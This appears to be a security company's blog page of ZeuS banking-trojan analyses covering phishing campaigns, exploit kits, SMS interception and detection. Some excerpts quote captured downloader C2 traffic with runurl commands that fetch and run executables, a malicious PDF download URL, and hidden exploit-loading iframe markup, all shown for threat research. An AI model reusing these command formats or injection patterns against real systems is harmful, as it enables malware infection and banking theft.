ZeuS

ZeuS P2P distribution campaign: ACH transaction canceled

Our team (S21sec) has detected a ZeuS trojan distribution by email campaign that has been running for some days. The malicious emails include a link to a supposed report about a cancelled transaction, which is actually an HTML page that loads Javascript code into the victim’s browser. This code tries to exploit different vulnerabilities in Java, Flash and PDF to install ZeuS 2.0 on the system. This is one of the latest versions of ZeuS which uses P2P as part of its infrastructure (Murofet 2.0).
 
The subject of the emails detected so far is “ACH transaction canceled” and in the body of the mail there is information about a supposed transaction that has been cancelled. If the victim wants further information then they have to visit a link that contains a report about the transaction:

For a few seconds the victim sees a screen indicating that they must wait. Meanwhile 4 scripts, stored on different domains are loaded into user’s browser. They are little more than simple redirections towards the site where the code (that will attempt to perform the exploitation) resides.

Analysis of a malicious PDF from a SEO Sploit Pack

According to a Kaspersky Lab article, SEO Sploit Pack is one of the Exploit Kits which appeared in the first months of the year, being PDF and Java vulnerabilities the most used in these type of kits. That's the reason why I've chosen to analyse a malicious PDF file downloaded from a SEO Sploit Pack. The PDF file kissasszod.pdf was downloaded from hxxp://marinada3.com/88/eatavayinquisitive.php and it had a low detection rate. So taking a look at the file with peepdf we can see this information:

In a quick look we can see that there are Javascript code in object 8 and that the element /AcroForm is probably used to execute something when the document is opened. The next step is to explore these objects and find out what will be executed:

Source Seattle 2011

Some days ago, Source Seattle (USA) took place. It is the first time it has taken place in Seattle and although the attendance couldn’t match the Boston conference, the atmosphere was magnificent. It began on Tuesday the 14th with an event for the speakers and organizers to get to know each other and enjoy a beer with some tasty Asian cuisine. I was the representative of the S21sec e-crime team with a speech about banking Trojans.

The talks began on Wednesday the 15th and the agenda was divided into two tracks, one dedicated to technical themes and the other centred on the business world. The first day, the following themes (amongst others) were touched on: evaluation of necessary expenses in security, the application of the law in cybercrime matters, threat modelling, forensic memory analysis of Android’s Dalvik Virtual Machine and my speech about the evolution of fraud through banking Trojans.

Yet another Oficla email campaign (CV)

This time I've received a nicer e-mail, a woman sending me her CV!! with a picture of her included too!! :) In fact, she has included in the image some words too, a bit strange...

Again the same actors: Oficla and ZeuS. This time not Feodo downloading. Inside the zip file we can find the Oficla sample, with a medium detection rate. It connects with the domain showtimeru.ru (now it's down) to ask for URLs to download more malware:

http://showtimeru.ru/show/bb.php?v=200&id=428308300&b=0711_e&tm=6832
[info]runurl:http://1xx.1xx.1xx.46/test/esmilk.exe|taskid:8|delay:15|upd:0|backurls:[/info]

The server response contained the same URL (active yet) as the DHL campaign, downloading the same version of ZeuS, different MD5.

Beware with women!! they are not trustful!! ;)

DHL e-mail campaign downloading ZeuS and Feodo

This past month a new DHL campaign has been spreading malware in a zip file. The executable in the zip was identified (with a high detection rate) as Oficla by the Antivirus engines. This malicious code, with filename DHL_Etiqueta.exe, acts as a downloader asking a server the URLs it must use to download the other malicious files. It always uses in the requests the User-Agent Opera\9.64. These are the requests and responses in this case:

http://xxxxxx.ru/mydog/bb.php?v=200&id=428308299&b=2510_dhl&tm=1397
[info]runurl:http://1xx.1xx.1xx.xx/test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]

http://xxxxxx.ru/mydog/bb.php?v=200&id=428308299&tid=16&b=2510_dhl&r=1&tm=1397
[info]kill:0|runurl:http://1xx.1xx.1xx.xx/test/esmilk.exe|taskid:17|delay:15|upd:0|backurls:[/info]


Both of the downloaded files, morph.exe and esmilk.exe, are banking trojans. The former is a sample of Feodo, with a low detection rate (7/41), which downloads the configuration file from a server after sending to it a POST request:

Some thoughts and facts about ZeuS MitMo

One month ago David Barroso and me visited one online banking user. David extracted one file from his mobile phone and I picked some ZeuS files up  from his computer.This was the starting point of the so-called ZeuS MitMo.

When ZeuS injects HTML code it usually asks the user for the necessary TANs in order to carry out a fraudulent transaction, but sometimes this information is not enough. Some banks ask for an additional code, sent by SMS, that the user (or criminal) must enter to finish the process. Until that moment this type of authentication (two-factor authentication) was successful, but not since then. This ZeuS gang had modified the configuration files to ask for the mobile phone number too. It's not so strange, but yes using it to commit the fraud. They sent to him an SMS with a link inside, telling the user that he should install that "certificate". When the user installed it, the malicious application began to monitor all the incoming SMSs, looking for the bank SMS and forwarding it to the criminals. This way they already had all the information they needed to make the transaction, game over.

Apart of asking for the user phone number the configuration file had other curious things. When the user visited the online banking URL ZeuS added an script element to the legitimate web page pointing to an URL, avoiding to store all the HTML code in the config file. But this is not the strange thing, it's that normally the src attribute it's an absolute URL while in this case was a relative one:

ZeuS spreading via Facebook

ZeuS is still the talk of the town. It's downloaded through fake antivirus, downloaders and several exploit kits. Of course, the best-known social networking site couldn't be out of this. Last week we could see some Facebook messages like the following:

The link in the message would take the users to a Facebook phishing page where they were requested to authenticate. Simultaneously, obfuscated Javascript code was being executed, creating a hidden iframe in the page body:

This iframe redirected the user to another web page with two more iframes:

<iframe g1g="321" src="xd/pdf.pdf" l="56" height="31" width="13">
<iframe g1g="321" src="xd/sNode.php" l="56" height="31" width="13">

After advancing further, we arrived to a directory listing in the same server:

New ZeuS binary

The evolution continues. Some days ago a new ZeuS binary appeared with the version number 1.3.0.26. This new development is an attempt to improve the stealth techniques used to date, as stated in one of the TODO files found some time ago. After just a quick look, one can notice the following changes:

  • When it's executed and the system isn't infected yet, it copies itself in the directory %SystemRoot%/system32, but with a different filename in each execution. Also it gets the basic file information from the %SystemRoot%/system32/ntdll.dll file (creation, last access and modification dates).

  • If it finds a previous ZeuS version installed it deletes the binary, leaves and shows the hidden files in the next reboot. To give an idea of the situation, one of the latest samples with sdra64.exe as executable filename is the 1.2.12 one.

  • Apparently the configuration and data files are not stored on disk anymore but they're exclusively stored in memory.

Detecting ZeuS

In the S21sec blog we have been talking some time ago about our dear friend, almost one more colleague: ZeuS. It is a malware with more than 3 years of life which continues changing and evolving to hide itself better and making the fraud more efficient. But what we maybe have not mentioned yet is how to know if our little friend is here, spying all our movements and reporting all of this to its parents, because sometimes the AV software is not so effective as we expect.

There are several evidences in its different versions which mean that we are infected with ZeuS:

  • Filesystem
  • ZeuS leaves a trace in the filesystem when it's installed in the computer, but it hides and blocks all the files it creates, avoiding that a normal user can see and delete them. The solution to find these files is using antirootkit software which will show us the hidden files.

Syndicate content